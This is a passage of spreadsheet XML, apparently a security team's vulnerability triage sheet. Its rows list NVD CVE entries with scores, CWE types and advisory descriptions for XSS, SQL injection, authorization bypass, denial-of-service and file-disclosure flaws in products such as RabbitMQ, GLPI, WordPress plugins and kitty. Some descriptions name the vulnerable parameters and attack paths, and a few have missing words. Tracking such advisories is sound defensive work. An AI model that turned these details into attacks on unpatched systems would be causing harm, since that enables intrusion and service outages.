      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>Readwise Reader for Android constructs URLs in its WebView using attacker-controlled metadata without proper encoding or escaping. The application interpolates untrusted values directly into URL strings and inserts them into the DOM via innerHTML. Because the interpolation occurs without HTML or JavaScript context encoding, a crafted metadata value can break out of the intended URL structure and inject script content. An attacker could supply a document containing malicious metadata that, once synchronized to an Android device and rendered in the Reader WebView, results in execution of injected script content, enabling stored cross-site scripting (XSS)</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18312</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18320</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>Readwise Reader for Android uses a sanitize-html configuration that permits all attributes on SVG and PATH elements due to a wildcard attribute rule. This configuration fails to remove script-capable attributes such as event handlers (e.g., 'onload', 'onerror'). An attacker could supply a document containing malicious SVG content that survives sanitization and executes script wher rendered in the Reader WebView, resulting in client-side cross-site scripting (XSS).</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18320</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78393</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>The Link Library WordPress plugin before 7.9.6 does not properly escape some parameters before outputting them in the addresses of links it generates on its front-end directory pages, leading to Reflected Cross-Site Scripting which could be used against any visitor, including logged-in administrators.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78393</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78902</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>Cross Site Scripting vulnerability in Netgate pfSense 26.03.1-RELEASE allows an attacker to execute arbitrary code via the pfBlockerNG package</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78902</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88996</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>The WPForms – AI Form Builder for WordPress – Contact Forms, Payment Forms, Survey Form, Quiz &amp; More plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'page_title' POST Parameter via {page_title} Smart Tag in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is only exploitable on forms whose admin-authored confirmation message places the {page_title} Smart Tag inside an HTML attribute context.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88996</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92212</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder — Dynamic Blocks Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'jfb_xss' (URL Query Variable) Parameter via Calculated Field in all versions up to, and including, 3.6.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Exploitation requires the targeted page to host a form configured with both a URL Query Variable preset field and a Calculated Field that references it, which are standard plugin features.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92212</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53627</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, a low-privileged authenticated user can use the new API (v2) to perform update operations that the same user is normally forbidden to perform through the user interface. The API update flow does not consistently enforce the applicable authorization checks. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53627</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54790</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane stores an administrator-controlled custom_field_table value without validating it against the allowed custom-field table names. Mdl_custom_fields::used() later concatenates that stored value into the FROM table and WHERE column identifier positions, so opening the custom-field edit form executes a second-order SQL injection. The injection can query arbitrary schema data and can cause application errors or denial of service. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54790</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66071</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15 and 4.0.22 and 4.1.11 and 4.2.6 and 4.3.1, Atom exhaustion: OAuth2 JWT tag: scope values. extractscopes/1 parses scopes of the form .tag: and calls rabbitdatacoercion:toatom() to convert to a tag atom. The token signature is verified first, so the attacker cannot forge scopes , but in IdP configurations where scope content is user-influenced, each login with a novel tag value leaks one In deployments where users can influence the scopes included in their IdP-issued JWT rabbitmqauthbackendoauth2 enabled IdP permits attacker-influenced scope values in signed tokens. This issue is fixed in versions 3.13.15 and 4.0.22 and 4.1.11 and 4.2.6 and 4.3.1.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66071</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66073</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>requests, go, gin</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6, Atom table exhaustion via management API node field. pUT /api/queues/:vhost/:name (and the exchanges and bindings endpoints) accepts a node JSON field. The value goes through rabbitnodes:make → listtoatom with no cluster membership check first. Each unique value permanently leaks one atom. A March 2026 refactoring (ea61ce2563) introduced safe helpers in rabbitmgmtnodes.erl (parsenodename, safeatom, and requirenodename, using binarytoexistingatom) and fixed several callers (QQ replica ops, wmauthattempts, wmnodememoryets, getsortreverse, and rabbitfederationmgmt), but getnode/1 in rabbitmgmtutil.erl:880-885, the primary vector used by directrequest/6, was not Roughly 900K requests crash the VM via systemlimit, and all tenants lose Any user with the management tag and one vhost, the lowest privilege This issue is fixed in versions 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66073</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67411</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.18, 4.0.23, 4.1.14, 4.2.9, and 4.3.3, native MQTT and MQTT over WebSocket behind a trusted PROXY Protocol frontend could lose the proxy-derived client address before the MQTT authentication path checked loopback_users, causing the frontend-to-broker address to be treated as loopback. An attacker who can reach the trusted frontend and has valid credentials for a loopback-restricted account can therefore bypass the source-address restriction; the issue does not bypass password authentication. This issue is fixed in versions 3.13.18, 4.0.23, 4.1.14, 4.2.9, and 4.3.3.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67411</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67412</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 4.3.3, 4.2.9 , 4.1.14, 4.0.24, and 3.13.18, Federation upstream in RabbitMQ skips vhost authorization allowing cross-vhost message access. what the bug lets you do. A policymaker on one vhost reads and drains messages out of another vhost it has no permission on. With the default ack-mode the source messages are consumed (deleted), not copied. Why that should not 1. Federation validates the upstream URI without any vhost-access Cross-vhost message read/drain from a per-vhost policymaker, breaking vhost tenancy This issue is fixed in versions 4.3.3, 4.2.9 , 4.1.14, 4.0.24, and 3.13.18.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67412</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67413</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>express, gin</t>
        </is>
      </c>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.0.23, 4.1.14, 4.2.9, and 4.3.3, the optional rabbitmq_jms_topic_exchange plugin's x-jms-topic exchange accepted a client-controlled rjms_erlang_selector binding expression whose LIKE evaluator expanded percent and underscore wildcards into overlapping PCRE fragments. It executed those fragments with raw re:run/3 without match or recursion limits, allowing an authenticated tenant that can bind and publish to consume broker scheduler CPU and deny service with pathological selectors. This issue is fixed in versions 4.0.23, 4.1.14, 4.2.9, and 4.3.3.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67413</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80432</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in the drop handling path of the drag and drop protocol in kitty from 0.47.0 before 0.49.0 allows a program writing to the terminal to obtain the contents of files dragged over the window even when the user never completes the drop, because drop_enqueue_request() in kitty/dnd.c serves a drag data request without first checking the drop state of the window, so a client that issues the request while a drag is merely hovering receives the data offered for the drag. In the same file, drop_left_child(), which runs when the drag leaves the window without a drop having occurred, releases the offered MIME list but retains the pending request state, the open file descriptor and its main loop transfer timer, the directory handles, the URI list and the pending MIME name, so a client can continue to read through a retained directory handle, and an in-flight file transfer continues to stream, when no drag is in progress. The file contents are read from the filesystem by the kitty process itself using the paths the drag source offered. This results in disclosure of the contents of files the user moved over the window without ever releasing them into it.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80432</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100574</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
